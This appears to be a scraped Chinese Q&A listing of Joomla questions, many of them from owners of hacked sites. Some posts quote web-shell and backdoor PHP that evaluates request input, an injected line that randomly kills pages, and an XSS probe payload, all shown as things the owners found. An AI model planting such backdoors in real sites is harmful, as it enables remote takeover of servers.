在哪里可以找到Joomla头文件?
我知道头文件在模板->index.php文件中被调用,
jdoc::include type="head"/>
但是我想知道joomla中的头文件的确切文件/路径。
浏览 2提问于2014-04-15得票数 0
我需要发展我的joomla知识,所以请指导我,哪些是joomla开发人员必须访问的日常网站?其他则是堆栈OverFlow。
浏览 1提问于2011-03-25得票数 0
回答已采纳
我试图在Kali上运行Metasploit中的这种利用。我的文件在漏洞文件夹中,我只需要执行脚本,但我得到了一些错误。以下是网站上的描述:
# 18
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only F
浏览 0提问于2015-07-21得票数 -5
昨天,在我的web服务器上,我捕获了一个POST请求,其中包含了host的以下文本
"><script>alert('qualys_xss_joomla_2.5.3')</script>
完全是这样的
headers
{
...
"host": "%22%3e%3cscript%3ealert('qualys_xss_joomla_2.5.3')%3c%2fscript%3e",
"x-forwarded-port": "443",
"x
浏览 0提问于2018-12-21得票数 0
回答已采纳
1回答
我正在开发网页(让我们称之为NWP),这应该与joomla (1.5)网页合作。用户db对于两个网页都是共享和可访问的。另外,这两个站点是在子域上服务的。
当用户在NWP上进行身份验证时,我用我的session_id更新joomla的会话表,并提供所需的每个参数。在此之后,我还更改了joomla网页上的cookie (在joomla db中已经创建了会话id的会话cookie )。
在这项工作完成后。Joomla应该会识别出我已登录,但实际上什么也没有发生。我认为joomla本身会生成“某种”session_id来识别它不是伪造的,就像我的一样。
请帮助我,或者分享你的经验来实现我的目标。你会
浏览 1提问于2017-03-02得票数 0
我正在构建一个Windows Phone 8应用程序,它需要从一个基于Joomla的网站获取数据。
是否可以创建我的应用程序可以使用的can服务?
还是有更好的方法?
我相信Joomla的版本是2.5.9
浏览 1提问于2013-11-15得票数 0
1回答
在安装joomla 1.5.15时,我得到了上面的错误。
framework.php文件中的代码是
@set_magic_quotes_runtime( 0 );
@ini_set('zend.ze1_compatibility_mode', '0');
请帮助我在我的系统中运行joomla
浏览 3提问于2016-10-03得票数 1
回答已采纳
2回答
apache安全性
、、、
我需要使用facebook应用程序,但我的网页返回响应206而不是200,因此facebook应用程序返回http代码500。
我使用进行了测试,当它们是相同的curl -I响应数据时,返回206而不是joomla.it返回200
我用这个perl脚本进行了测试:,我的页面是易受攻击的,而joomla.it是好的。
我认为我的答案在和之间非常接近
但我不明白如何更改我的apache配置。解决方案可以在这个页面中找到:使用类似代码的www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35.2:
SetEnvIf Range (,.*
浏览 1提问于2012-06-26得票数 1
回答已采纳
我在example.com/fresh上安装了一个Joomla站点。现在,我想安装WordPress。我计划在子目录WordPress下安装information;所以我的URL将是example.com/information。
现在,当我配置WordPress安装时,我可以使用与Joomla站点相同的MySQL数据库吗?我知道使用前缀可以让它工作。对于一个小的网站来说,这是一个很好的实际决定吗?
浏览 0提问于2014-09-02得票数 3
回答已采纳
我有一个web服务器托管Joomla1.5。我发现Joomla配置文件configuration.php是由黑客修改的。他怎么能这样做呢?
注意,该文件具有777权限。另外,当我试图直接浏览文件www.mysite.com/configuration.php时,我会得到一个空页面作为响应。
浏览 0提问于2012-04-08得票数 1
回答已采纳
我有几个旧的1.5版本的joomla网站已经开始显示大量这样的错误:
Strict Standards: Non-static method JLoader::import() should not be called statically in /data02/eebackup/public_html/josephstorehouseuk/libraries/joomla/import.php on line 29
Strict Standards: Non-static method JLoader::register() should not be called statically
浏览 2提问于2014-05-02得票数 0
在哪里我可以找到特定应用的ModSecurity规则,特别是joomla,wordpress,mambo?
浏览 0提问于2012-04-11得票数 3
回答已采纳
有人更改了我的Joomla管理员密码。这怎么可能,因为只有我有所有的cpanel详细信息。但我在我的数据库表中发现了几个不需要的条目。是黑客还是怎么的,请指点一下。
浏览 3提问于2015-05-07得票数 0
2回答
我有一个客户,他的Joomla网站被黑客入侵,我不太清楚这是怎么发生的,但我可以看到,有许多脚本发送垃圾邮件,在搜索包含单词eval的文件时(我发现了61个匹配的文件,如下所示:
<?php
$lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
$mglvq = $_REQUEST['tlhqdsj'];
eval($mglvq);
exit();
}
if (isset($_REQUEST['o
浏览 1提问于2013-10-31得票数 1
回答已采纳
2回答
如果您使用wordpress之类的内容,并且由于一些新的安全威胁需要升级,那么您的一些插件和扩展将无法工作。
因此,如果你不升级,你将面临安全问题,如果你做了一半的插件将无法工作。
我认识一些人,他们抛弃了wordpress、magento和joomla等产品。
处理这个问题的正确方法是什么?有解决办法吗?
浏览 0提问于2012-05-24得票数 2
2回答
我的joomla站点被黑了,我在库文件夹中得到了一个文件,那就是reads.php文件。当我打开这个文件时,发现只有一行是
<?php @eval($_POST[1]); ?>
我不明白什么数据黑客会得到这一行。请推荐我。
浏览 2提问于2016-04-02得票数 4
我需要确保我管理的PHP站点没有任何常见的PHP缺陷,如SQL注入,错误配置的文件和文件夹的权限等。我的意思是,例如Joomla站点与插件和模块。手动进行此安全检查可能会很耗时,并且可以每天运行自动测试,以确保没有任何更改。
所以我的问题是,有没有好的自动化软件来解决这个问题,或者我必须自己编写一个?
浏览 2提问于2010-09-29得票数 30
回答已采纳
我在Joomla中创建了一个菜单项“联系我们”,它的类型是“单篇文章”。但是,当我单击前面的菜单项时,它不会显示文章内容。相反,它将我重定向到"Contact us.html“文件,并显示了错误page not found。
当我使用name和id (通过链接)访问文章时,它正常工作。
我必须在模板中做些什么,这样用户才能被正确地重定向到文章?
谢谢。
浏览 0提问于2013-08-31得票数 0
回答已采纳
3回答
是否有一个自动工具,可以获取主机列表并计算出它们正在运行的公共web应用程序(如Wordpress、Mediawiki、Joomla等),以及--如果可能的话--安装了哪个版本和哪个插件?
浏览 0提问于2011-09-17得票数 4
努布在这里..。我付钱给别人是为了找出为什么我的joomla站点速度减慢,带宽超过等等。
他们告诉我,我正在经历通过我的RSS提要的sql注入攻击,他们在我的站点上做了一些我不明白应该阻止或减缓问题的工作。我不认为它有用。
有人能告诉我一个教程,或者告诉我一个新手用什么工具来分析我的站点/服务器吗?
浏览 0提问于2011-06-10得票数 0
我的VPS已经被关闭了第二次因为违反TOS (垃圾邮件),我真的需要一些帮助。我和我的服务器被攻击已经一年多了。我的大多数站点都在运行Joomla,从1.5安装到3.1安装不等(因为客户已经拒绝了升级,实际上只有两个站点运行1.5)。我不知道漏洞在哪里。我已经浏览了我的所有脚本并启用了captcha,更改了我的管理密码,更改了我的数据库密码,并根据joomla的易受攻击扩展列表检查了我的扩展。我还能设置什么来防止这种情况发生呢?THis大约是我一年中的第五次攻击,也是我第五次收紧一切,只是为了让我的努力fail....grrrrr。
浏览 0提问于2013-07-26得票数 -1
我在本地从生产服务器下载了一个新工作Joomla!1.5.22的运行系统。现在我找不到可以更改基本URL的地方了。我已经在uri.php中摆弄过uri.php类,但没有结果。然后,我从SH404sef中删除了所有条目,而规范化已经关闭。有谁有主意吗?
浏览 3提问于2013-11-02得票数 0
回答已采纳
表前缀对安全性有什么作用?
当我在本地主机上安装Joomla时,“出于安全原因”,它总是生成唯一的表前缀。为什么?
浏览 1提问于2013-03-16得票数 1
1回答
我正在检查我的apache错误日志,我看到了一个奇怪的模式。
相同的IP请求,在1秒内,在网站中“常见”的页面: wp,wordpress,joomla。等。
因为这个特定的域没有这些文件夹,所以它立即返回404。
你会建议阻止这个IP吗?或者它是否是合法的?有什么工具可以追踪这些可疑的普通攻击,最好是免费的,或者至少是低成本的?
📷
浏览 0提问于2016-08-31得票数 0
查看Joomla的代码,我看到在索引的第一行中,它用dirname(__FILE__)定义了安装的基本路径。
这对网站来说可能有风险吗?如果一个不受控制的错误消息显示Joomla目录的内部路径,例如一个失败的包含,那么它能被用来对站点执行某种类型的攻击吗?如果是,使用这个功能方便吗?
浏览 0提问于2012-10-19得票数 2
回答已采纳
3回答
我正在开发一个web应用程序。我曾经用过Joomla这样的东西来做一些很棒的东西,但现在我终于用上了PHP、MySQL和CodeIgniter。
当你制作一个严肃的web应用程序来处理大量数据时,我应该对我的数据输入采取什么预防措施来完全清理它?我知道有明显的修剪,转义,xss清理等-但是我应该结合哪些其他技术来阻止注入到数据库中?
不仅如此,有没有什么非破坏性的数据库注入代码可以用来测试我的所有输入?也就是说,它将注入一些可见的东西,但实际上不会对我的测试数据库造成任何损害?我不是一个完全的黑客,在这方面需要一点指导。
黑客还使用什么其他常见的方法来销毁或读取用户数据,我如何自己检查?我没有
浏览 0提问于2010-02-28得票数 25
回答已采纳
我们的joomla站点使用的是1.7.3,当有大量用户在线时会出现性能问题,以及数据库损坏问题。被损坏的表是_session表。
我想尝试关闭会话处理,因此将Joomla全局配置中的会话处理程序从“数据库”设置为“无”。
这会导致其他问题吗?这样做的可能后果是什么?
谢谢,
肯
浏览 2提问于2012-03-20得票数 1
我知道任何一个网站的安全是一个非常艰难和广泛的话题需要讨论,但我想把这个问题与我的具体网站,我一直在工作。它是由其他程序员在2007年前后用php编写的,我负责它的管理。我的问题是它被黑了一次又一次。请帮帮我
Joomla版本1.5.18(与Virtuemart一起)
浏览 8提问于2013-10-02得票数 2
回答已采纳
我想创建一个简单的注册表作为我的Joomla 2.5网站的一个页面。在互联网上的任何地方,我都能看到有人要求我使用proforms、ckforms等扩展。大多数都有价格标签,而免费的没有数据库,我真的不想要太多的功能。
我只想让下面的代码正常工作。这样我就可以拉出POST变量并将它们插入到数据库中。
<form method="post" action="mycreatedpage.php">
<input type="text"/>
<input type="submit">
</f
浏览 3提问于2013-06-09得票数 1
我需要开发一个joomla组件,但我在定义哪个版本是最好的开始时感到困惑。joomla团队采用了6个月的发布周期,1.5.25是当前的LTS。
主要针对STS版本进行开发是否明智?
如果我针对当前的STS进行开发,那么在给定较短的发布周期的情况下,我是否必须将代码移植到下一个版本?
浏览 0提问于2012-01-17得票数 2
回答已采纳
4回答
我对攻击服务器等不太了解,但鉴于(相对)最近的Wordpress安全问题,我想知道是否有可能向外部世界隐藏您可能使用的CMS。
显然,你可以重命名默认登录页面、错误消息、图标(我到处都能看到joomla one ),还可以使用非默认模板,但我想知道的是以某种方式查看重定向之类的事情。大多数CMS会留下痕迹吗?
这不是为了取代其他形式的安全,而是一个更奇怪的问题。
谢谢你的见解!
浏览 0提问于2009-10-26得票数 3
回答已采纳
不幸的是,当我回到一个旧的Joomla 1.5站点时,我看到了这个错误。
JHTMLlist not supported. File not found.
这个问题有什么解决方案吗?
请注意,它不会更新。它是1.5.23
这是与主机相关的问题吗?
浏览 1提问于2012-10-23得票数 0
回答已采纳
1回答
Joomla服务器病毒或任何其他
、、、、
我有一个简单的Joomla站点,有时它会死掉。我发现了一个包含以下代码的文件:
if(date('s',time())%2==0) die();
我删除了代码,然后它出现在另一个文件中。
当我通过Akeeba下载站点并将其安装在本地主机上,然后删除所有的坏代码,那么站点就是干净的(并且病毒不会再回来)。但在我的服务器上病毒仍然活跃。
你知道怎么解决这个问题吗?
请帮帮我!
浏览 3提问于2015-02-02得票数 1
从Joomla到客户和供应商的邮件都被标记为“网络钓鱼”邮件。根据其他帖子中提供的解决方案,我检查了标题,并将其标记为"Spf-Fail“。这个问题的解决办法是什么?
非常感谢。
浏览 0提问于2014-02-14得票数 2
我刚刚开始在我的本地主机上运行的joomla dev站点的所有页面上出现间歇性错误。
完整的警告是:
Warning: simplexml_load_file(): I/O warning : failed to load external entity "/site/language/en-GB/en-GB.xml" in /site/libraries/joomla/language/language.php on line 1354
奇怪的是,它是间歇性的,几次刷新通常就能解决问题。
有没有可能是代码问题导致了这一问题,或者是其他原因?
浏览 1提问于2013-12-12得票数 6
回答已采纳
3回答
我正在为我的组织研究一个web应用程序漏洞扫描器。我想要一个带有漏洞的示例web应用程序(类似于应用程序端的元可绘制)来测试各种解决方案。有人知道吗?
我想比较一些商业解决方案的彻底性,如Accunetix,一些免费扫描仪,如黑米斯基利,马鹿,w3af,以及其他与回溯以及我自己的手动测试,以便得到硬数字,以及对工具的感觉。
编辑:是的,我知道我可以安装Wordpress 1.x,osCommerce (lol)或Joomla的旧版本
浏览 0提问于2012-10-12得票数 3
回答已采纳
3回答
请阅读更新,因为我的“实际混乱”在那里。
从Joomla开始,一直很安静!开始支持bcrypt哈希算法,同时支持自Joomla1.5以来事实上的md5 + salt。
现在我的问题是,“作为最终用户,如果我立即开始使用Bcrypt,与当前的算法MD5 + salt相比,我会得到什么好处?对于每天有几百名访问者的普通博客来说,这有什么不同吗?”
更新:-
我还在某个地方读到,由于md5哈希的速度,我的密码可以在几天/几个月@大部分时间内很容易计算出来。
但是,这是否需要我的散列已经与攻击者进行比较?如果他/她一开始没有哈希,那么我使用的散列算法如何影响我的站点安全?最终他不得不强迫我的登录页面?
浏览 3提问于2016-01-15得票数 13
回答已采纳
2回答
我已经在joomla网站上放置了带有西里尔文文本的like按钮:
当我按like按钮时,facebook的抓取器错误地对页面进行了编码。
另外,我已经创建了与这个URL ()相等的静态测试html页面,并且它抓取得很好。
这两个页面具有相同的内容,但问题页面是从Joomla PHP脚本生成的。
另外,我注意到scraper重新编码不是完整的文档(它保持头块不变),请在facebook上查看它的“查看我们的scraper为你的URL看到了什么”调试页面。
我能做些什么来解决这个问题?
浏览 0提问于2011-11-23得票数 0
2回答
制作土坯闪存网站安全吗?
、、、
我正在制作一个使用adobe闪光灯和动作脚本的网站。但我听说了很多关于闪存漏洞的事。
与wordpress和joomla等普通工具相比,使用adobe制作网站安全吗?
浏览 5提问于2016-01-27得票数 0
回答已采纳
1回答
我一直在研究如何在Joomla中最好地使用OPcache。
这个名为的github页面是对OPcache如何工作的最好解释,我在这里看到并试图得到几个问题的答案。
解析文件名
“解析文件名”是什么意思?
由于我使用Joomla,Opache使用什么作为“已解析的文件名”!我和CMS知道它总是调用index.php,但是传递不同的参数是解析的文件名index.php?querystring。
使用时间戳的
如何将“时间戳”应用于CMS/Framework系统,如Joomla!因为index.php文件从未改变,所以在我看来,缓存永远不会刷新。
Joomla!CMS缓存
浏览 0提问于2014-01-31得票数 0
回答已采纳
2回答
我想使用JOOMLA 2.5一次运行多个SQL更新查询。下面是我的代码:
require_once '../includes/framework.php';
$query = "UPDATE #__mytable SET myfield='value' where id=1; UPDATE #__mytable SET
myfield='value' where id=2; UPDATE #__mytable SET myfield='value' where id=3;";
$db = JFactor
浏览 0提问于2012-10-03得票数 6
回答已采纳
1回答
好的,我为我的Joomla安装了一个组件,但是现在我正在为添加一个自定义计数器视图而工作。
在组件的controller.php中,我添加了以下函数:
function updateView() {
$db = JFactory::getDBO();
$videoid = JRequest::getVar('videoid');
if ($videoid) {
$query = "update #__hdflv_upload SET times_viewed=1+times_viewed where id=$videoid
浏览 1提问于2015-12-26得票数 0
我最近上传了一个站点,将所有文件夹设置为-755权限,文件设置为-644权限。但是Joomla告诉我目录权限下列出的所有文件夹都是“不可写的”。现在,我将一些文件夹更改为-775,这似乎解决了我更改太久的文件夹的问题,列出了它们是“可写的”而不是“不可写的”,然而,这在安全性方面有多糟糕呢?
像这样的文件夹能以任何方式被黑吗?
浏览 0提问于2011-11-15得票数 1
3回答
好的白天/晚上的伟大思想,
我有一个功能完善的网站在网上托管在以下网址: www.gmaworld.com (恶意软件感染)。不幸的是,这个网站被恶意软件感染了。我希望将内容转移到另一个设置,以摆脱恶意软件。
然而,我关心的是如何在当前设置中备份/保留当前的插件,这样我就不会在新的设置中丢失它们。
我已经通读了joomla的大多数迁移/升级文章,似乎都没有提到这方面的任何内容。如果有帮助,我会使用shaper_qubic主题。
我将感谢每一点建议,以帮助我确保我的插件成功转移。
谢谢。
浏览 27提问于2016-07-19得票数 0
我已经安装了Joomla 3.x和一些模块。
我的一个模块是显示我的文章中某些类别的文章,但是当我使用时,CSS样式表不会加载。
当我查看源代码时,我发现上面页面中CSS样式表的URL变成了:
<base href="http://cambridge.mywebcommunity.org/index.php/10-%E7%88%B1%E7%AB%8B%E6%96%B9%E5%8A%A8%E5%90%91%E6%9B%B4%E6%96%B0/3-welcome-to-your-blog" />
..。而不是我放入的原始文件,如下所示:
<base href=&#
浏览 0提问于2013-05-13得票数 2
3回答
这个网站怎么会被感染呢?
、、、
我运行一个小网站的一些Joomla 1.5版本。今天看来,它遭到了黑客攻击:index.php和index2.php文件被覆盖,管理员帐户的密码被更改,images文件夹可能包含恶意的可执行文件。
我能够用备份恢复index页面,并用另一个特权用户帐户重置管理用户。
由于我在这些问题上不是很多专家,我的问题是:这个网站怎么会被感染?例如:如何实际删除和替换某些文件,并将可执行文件存储在文件夹中。怎么会有人更改管理员密码,但其他人却不动呢?
(我非常清楚安装核心版本更新的重要性-我更感兴趣的是如何执行这样的攻击。)
谢谢你有洞察力的回答。
浏览 0提问于2010-12-09得票数 1
回答已采纳
我有一个wordpress托管的网站,它正在经历某种攻击。我的主机统计数据显示,我的账户在短短20天内消耗了4 4GB的带宽。经过一番挖掘,我发现我的网站在短短几周内就有超过15,000的访问量。我检查了我的日志,发现了GET请求的模式。数以千计的IP在以下url上发出GET请求
1) /using-joomla/extensions/components/users-component/registration-form.html?layout=complete
2) /using-joomla/extensions/components/users-component/login-form
浏览 0提问于2015-11-25得票数 1
我想知道是否有有效的渗透测试工具,帮助评估我们的Joomla网站:"www.ous.edu.sd“,因为我们经历了上个月的黑客攻击。
浏览 7提问于2013-07-03得票数 0
我们正在尝试建立一个简单的BTB网站来支持我们的零售商(在那里他们可以下载产品文本/图像和公司品牌)。我们使用的是Joomla 1.5.2和Virtuemart 1.1.9
我们希望它是完全安全的(未注册的观众-和竞争-只需看到简单的介绍页面,并登录与选项注册)。没有任何内容。
我们还希望使用VM注册来注册新用户。
我使用指向virtuemart类别的Joomla菜单项设置了类别/产品的安全访问,并将菜单项访问设置为“已注册”。工作完美,用户没有登录,除了开机页面什么都看不到。登录后,所有产品类别均可通过菜单项获得。
但我们刚刚意识到这会搞乱用户注册。我们希望使用Virtuemart用户注册表
浏览 2提问于2012-05-01得票数 0
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
即时通信 IM
腾讯会议活动推荐
腾讯云开发者
